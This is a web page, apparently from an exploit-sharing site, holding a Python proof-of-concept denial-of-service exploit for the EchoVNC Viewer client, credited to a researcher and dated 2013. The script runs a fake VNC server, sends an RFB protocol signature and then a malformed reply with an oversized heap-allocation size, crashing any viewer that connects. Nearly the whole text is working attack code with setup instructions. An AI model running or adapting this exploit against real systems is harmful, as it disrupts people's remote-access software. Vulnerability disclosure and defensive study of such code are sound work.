扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
#!/usr/bin/env python #================================================================# # [+] Title: EchoVNC Viewer Remote DoS Vulnerability # # [+] Discovered: 29/07/2013 # # [+] Software Vendor: http://sourceforge.net/projects/echovnc/# # [+] Author: Z3r0n3 - Independent Security Researcher # # [+] Contact: z3r0n3@mail.com # # [+] Overview:# # A remote attacker can crash EchoVNC Viewer by sending a# # malformed request. the crash occurs when EchoVNC # # Viewer allocate a buffer from heap with the size specified # # by the malicious server. # # [+] NOTICE:# # You need to configure EchoVNC Viewer with the specified# # host/port below. # # When running the exploit, you need to put the IP and press # # OK button on EchoVNC Viewer main window. # #================================================================# import socket, sys; host="localhost" # Put the victim IP here port=5900; malreq=b"\x00\x00\x00\x00\x90\x90\x90\x90" # the first 4 bytes specifies if the # server needs authentication # \x00\x00\x00\x00 means the server # doesn't need user/password # the last 4 bytes specifies the # buffer size that will be allocated # in heap print("[+] Creating socket..."); srv=socket.socket(socket.AF_INET, socket.SOCK_STREAM); try: print("[+] Trying to bind.."); srv.bind((host,port)); except socket.error: print("[!] Can't connect..."); srv.close() sys.exit() print("[+] Trying to listen to %s:%d"%(host,port)); srv.listen(5) cnx, addr=srv.accept() print("[+] Client connected %s:%s"%(addr[0], addr[1])) print("[+] Sending protocol signature..."); cnx.send(b"RFB 003.008\n") print("[+] Sending malformed request with huge size for heap allocation"); cnx.send(malreq); cnx.close() srv.close() print("[x] EchoVNC Viewer should be down..."); |
体验盒子
